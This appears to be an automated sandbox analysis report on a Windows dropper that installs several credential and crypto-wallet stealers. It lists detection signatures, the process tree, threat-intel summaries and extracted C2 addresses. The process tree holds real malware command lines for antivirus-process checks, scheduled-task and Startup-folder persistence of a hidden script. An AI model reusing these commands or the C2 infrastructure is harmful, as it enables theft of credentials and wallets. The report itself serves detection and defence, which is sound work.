Edit tour

Windows Analysis Report
OmnqazpM3P.exe

Overview

General Information

Sample name:	OmnqazpM3P.exe renamed because original name is a hash value
Original sample name:	51abf67011f60975d76946357ee94a48.exe
Analysis ID:	1502213
MD5:	51abf67011f60975d76946357ee94a48
SHA1:	ca1761459e162628d9db5093f1935834ba36214d
SHA256:	438fee0f31c00d0de0b13027e8ec9c47030556d3d8865e5518cac184edf6cd0a
Tags:	exe
Infos:

Detection

LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (creates a PE file in dynamic memory)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected Stealc

Yara detected Vidar stealer

Yara detected zgRAT

.NET source code contains very large array initializations

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Creates HTML files with .exe extension (expired dropper behavior)

Drops PE files with a suspicious file extension

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Installs new ROOT certificates

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Potentially malicious time measurement code found

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: WScript or CScript Dropper

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes many files with high entropy

Writes to foreign memory regions

Wscript called in batch mode (surpress errors)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops certificate files (DER)

Enables debug privileges

Enables security privileges

Entry point lies outside standard sections

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries keyboard layouts

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: SCR File Write Event

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

OmnqazpM3P.exe (PID: 6664 cmdline: "C:\Users\user\Desktop\OmnqazpM3P.exe" MD5: 51ABF67011F60975D76946357EE94A48)

axplong.exe (PID: 6532 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: 51ABF67011F60975D76946357EE94A48)

axplong.exe (PID: 4744 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 51ABF67011F60975D76946357EE94A48)

axplong.exe (PID: 6664 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 51ABF67011F60975D76946357EE94A48)

crypted.exe (PID: 5328 cmdline: "C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe" MD5: 6134586375C01F97F8777BAE1BF5ED98)

conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 5144 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

crypteda.exe (PID: 2448 cmdline: "C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe" MD5: 8E74497AFF3B9D2DDB7E7F819DFC69BA)

RegAsm.exe (PID: 6332 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

pLAZbVgk7u.exe (PID: 6448 cmdline: "C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe" MD5: 88367533C12315805C059E688E7CDFE9)

conhost.exe (PID: 2860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

6rxotqIg7H.exe (PID: 5952 cmdline: "C:\Users\user\AppData\Roaming\6rxotqIg7H.exe" MD5: 30F46F4476CDC27691C7FDAD1C255037)

Nework.exe (PID: 5828 cmdline: "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe" MD5: F5D7B79EE6B6DA6B50E536030BCC3B59)

Hkbsse.exe (PID: 2836 cmdline: "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe" MD5: F5D7B79EE6B6DA6B50E536030BCC3B59)

stealc_default2.exe (PID: 6624 cmdline: "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe" MD5: 7A02AA17200AEAC25A375F290A4B4C95)

caesium-image-compressor.exe (PID: 2696 cmdline: "C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe" MD5: 297FA8C27084D876F6699D121F9C06FA)

BitLockerToGo.exe (PID: 5900 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

BitcoinCore.exe (PID: 3424 cmdline: "C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe" MD5: 304A5A222857D412CDD4EFFBB1EC170E)

PureSyncInst.exe (PID: 4332 cmdline: "C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe" MD5: 366EB232CCB1D3D063E8074F8C4B529F)

BitLockerToGo.exe (PID: 5716 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

runtime.exe (PID: 6056 cmdline: "C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe" MD5: 046EBD7E0F619F33DE609EA3F126B0D3)

cmd.exe (PID: 5336 cmdline: "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6560 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 3376 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 4256 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 2860 cmdline: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 6776 cmdline: cmd /c md 591950 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 5300 cmdline: findstr /V "BachelorRayPotentialBeats" Itsa MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 3348 cmdline: cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Shipment.pif (PID: 3920 cmdline: Shipment.pif E MD5: 18CE19B57F43CE0A5AF149C96AECC685)

cmd.exe (PID: 7124 cmdline: cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3996 cmdline: schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 2944 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & echo URL="C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 1580 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

Amadeus.exe (PID: 1652 cmdline: "C:\Users\user\1000238002\Amadeus.exe" MD5: CED97D60021D4A0BFA03EE14EC384C12)

385107.exe (PID: 7032 cmdline: "C:\Users\user\AppData\Local\Temp\1000262001\385107.exe" MD5: 14A56F81287D1E037FC6405247C31D20)

Install.exe (PID: 3180 cmdline: .\Install.exe MD5: 059A2BA5620F3F4B2316685ECFCD36BD)

Hkbsse.exe (PID: 2972 cmdline: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe MD5: F5D7B79EE6B6DA6B50E536030BCC3B59)

wscript.exe (PID: 5828 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

Hkbsse.exe (PID: 5976 cmdline: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe MD5: F5D7B79EE6B6DA6B50E536030BCC3B59)

Amadeus.exe (PID: 5848 cmdline: "C:\Users\user\1000238002\Amadeus.exe" MD5: CED97D60021D4A0BFA03EE14EC384C12)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php"}

Threatname: LummaC

{"C2 url": ["condedqpwqm.shop", "traineiwnqo.shop", "stamppreewntnq.shop", "stagedchheiqwo.shop", "locatedblsoqp.shop", "caffegclasiqwp.shop", "evoliutwoqm.shop", "millyscroqwp.shop"], "Build id": "tLYMe5--newnew"}

Threatname: Vidar

{"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default2"}

Threatname: Amadey

{"C2 url": "185.215.113.19/CoreOPT/index.php", "Version": "4.41", "Install Folder": "417fd29867", "Install File": "ednfoki.exe"}

Threatname: RedLine

{"C2 url": "95.179.250.45:26212", "Bot Id": "LiveTraffic", "Message": "Error! Disable antivirus and try again!", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exe	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Nework[1].exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\1000238002\Amadeus.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Amadeus[1].exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x45693:$s1: file:/// 0x455ef:$s2: {11111-22222-10009-11112} 0x45623:$s3: {11111-22222-50001-00000} 0x4264e:$s4: get_Module 0x3cd3c:$s5: Reverse 0x3da37:$s6: BlockCopy 0x3cd0a:$s7: ReadByte 0x456a5:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 6 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000002C.00000002.3330388313.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000018.00000003.3204266932.0000000001D10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000012.00000000.2761389171.0000000000521000.00000020.00000001.01000000.00000014.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000018.00000002.3327893982.00000000018D6000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000012.00000002.2763337703.0000000000521000.00000020.00000001.01000000.00000014.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000013.00000000.2762025152.0000000000521000.00000020.00000001.01000000.00000014.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000002.2975464614.0000000001C7C000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000014.00000002.3033783708.000000000168E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000025.00000002.3378407711.0000000000E21000.00000020.00000001.01000000.0000001E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002E.00000002.3312997597.0000000000E21000.00000020.00000001.01000000.0000001E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000018.00000003.3204266932.0000000001CCC000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000003.2083364986.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002D.00000000.3244606985.0000000000521000.00000020.00000001.01000000.00000014.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000011.00000000.2751658343.00000000001F1000.00000020.00000001.01000000.00000013.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000003.00000002.2162837342.0000000000171000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000007.00000002.2691967398.0000000003FC5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000018.00000002.3371228781.0000000001E19000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000002E.00000000.3281580871.0000000000E21000.00000020.00000001.01000000.0000001E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000018.00000003.3204266932.0000000001E19000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000015.00000002.2975908580.0000000001DE7000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000018.00000002.3370673324.0000000001B80000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000015.00000002.2975464614.0000000001B4C000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000015.00000002.2975464614.0000000001B4C000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000003.00000003.2122678951.0000000004970000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000006.00000003.2659803462.0000000004970000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000C.00000002.2724562892.0000000000479000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000011.00000002.2763142147.00000000001F1000.00000020.00000001.01000000.00000013.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000016.00000002.3000690685.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000002.00000002.2151587366.0000000000171000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000018.00000002.3371228781.0000000001CCC000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000D.00000000.2723547615.00000000001C2000.00000002.00000001.01000000.0000000D.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000015.00000002.2975464614.0000000001C30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000015.00000003.2957476998.0000000001DE7000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000002D.00000002.3374733512.0000000000521000.00000020.00000001.01000000.00000014.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000F.00000000.2724132947.0000000000CE2000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000003.2111336808.0000000004E10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000009.00000002.2835698109.0000000000421000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000015.00000002.2975464614.0000000001BE4000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000013.00000002.2764100441.0000000000521000.00000020.00000001.01000000.00000014.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2123628862.00000000007B1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000025.00000000.3167830947.0000000000E21000.00000020.00000001.01000000.0000001E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000018.00000002.3371228781.0000000001D10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: crypted.exe PID: 5328	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5144	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5144	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6332	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: pLAZbVgk7u.exe PID: 6448	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 6rxotqIg7H.exe PID: 5952	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 6rxotqIg7H.exe PID: 5952	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 6624	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 6624	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: stealc_default2.exe PID: 6624	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 6624	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 55 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
